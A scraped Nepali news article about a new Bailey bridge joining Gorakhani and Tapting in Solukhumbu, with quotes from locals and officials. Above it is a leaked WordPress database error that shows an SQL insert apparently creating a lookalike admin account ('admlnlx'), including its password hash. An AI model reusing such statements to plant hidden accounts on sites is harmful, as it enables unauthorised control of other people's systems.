WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQtqOi0oYUj6pGsbjx08tEVruN1Mvv0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 14:22:42', '', 'admlnlx', 'admlnlx')

बेलीब्रिजले जोड्यो सोलुदुधकुन्ड नगरपालिकाको गोराखानी र टाप्टिङ – Gaule Khabar

बेलीब्रिजले जोड्यो सोलुदुधकुन्ड नगरपालिकाको गोराखानी र टाप्टिङ

बेलीब्रिजले जोड्यो सोलुदुधकुन्ड नगरपालिकाको गोराखानी र टाप्टिङ

गाउँले न्युज, ८ साउन, सोलुखुम्बु । हिमाली जिल्ला सोलुखुम्बुको सोलुदूकुण्ड नगरपालिकाको गोराखानी र टाप्टिङलाई बेलीब्रिजले जोडेपछि स्थानीय हर्षित भएका छन् । नगरपालिकाको वडा नम्बर ९ र १० को बिचमा पर्ने सोल्नासाखोलामा नगरपालिकाको एक करोड ६२ लाख ६६ हजार रुपियाँको लागतमा बेलीब्रिज निर्माण सम्पन्न भएर आवतजावत गर्न पाएपछि स्थानीय खुसी भएका हुन् ।

स्थानीय लाक्पा शेर्पाले खुशी हुँदै भन्नुभयो, यो पुलले हामी विकट गाउँमा बस्ने जनतालाई सुगम स्थानसँग जोडेको छ, यसले हाम्रो गरिबीलाई माथि उकास्न सहयोग गर्ने छ । अन्य स्थानमा वर्षाैँसम्म पुल नबनेर समस्या भइरहेका बेला नगरप्रमुख नाम्गेलजाङ्बु शेर्पाको सक्रियताले एक वर्षमानै पुल बन्नु ठूलो कुरा भएको उहाँले बताउनुभयो ।

निर्माणको जिम्मा लिएको ईन्द्रेणी दावा जेभी कन्स्ट्रक्सनले वि.सं. २०७५ साल जेठ महिनामा सम्झौता गरी करिब एक वर्षमा काम सम्पन्न गरेपछि अहिले आवतजावत सुरु भएको सोलुदूकुण्ड नगरपालिकाका सूचना अधिकारी दापासा शेर्पाले जानकारी दिनुभयो ।

पुल बनेपछि खुशी व्यक्त गर्दै सोलुदूधकुण्ड नगरपालिका वडा नं. ९ गोराखानीका वडा अध्यक्ष काजी शेर्पाले भन्नुभयो, बेलीब्रिजले टाप्टिङ जन्तरधाप सडकमा सिधा यातायात जोडिएको छ भने गोराखानीबाट डाँडाखर्क हुँदै भित्ताखर्क खोरिया पुल भएर सल्लेरी सरदरमुकाम जोडिएको छ । ग्रामीण क्षेत्रमा पुल निर्माण गरेर जनतालाई सुविधा प्रदान गर्ने नगरप्रमुख नाम्गेलजाङ्बु शेर्पाको खटाईले छिटो काम भएको हो, अध्यक्ष शेर्पाले भन्नुभयो ।

पुलले स्थानीयको धेरै सपना पूरा गर्ने आधार तयार गरेको उहाँले बताउनुभयो । उहाँकाअनुसार अब राजधानीसँग सिधा यातायातको पहुँच हुने, सदरमुकाम आवतजावत गर्न तथा विरामी हुँदा एम्बुलेन्सबाट अस्पतालसम्म लैजान सहज हुने, स्थानीय उत्पादनलाई बजारमा सजिलै पु¥याउन सकिने छ । सिधा यातायात पहुँचले दैनिक उपभोग्य सामानको मूल्य समेत घट्ने उहाँको भनाइ छ ।

जिल्लाकै राम्रो स्याउ उत्पादन हुने गोराखानी र टाप्टिङ क्षेत्रमा पछिल्लो समय व्यवसायिक कृषितर्फ आकर्षण बढ्न थालेकाले कृषि उपजलाई बजारसम्म लान सजिलो हुने स्थानीय कृषक बताउँछन् । त्यस क्षेत्रमा हजारौँको संख्यामा किबी खेती सुरु गरिएको छ भने उत्पादन समेत हुन थालेको छ ।

साभार: हिमशिखरन्युज

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका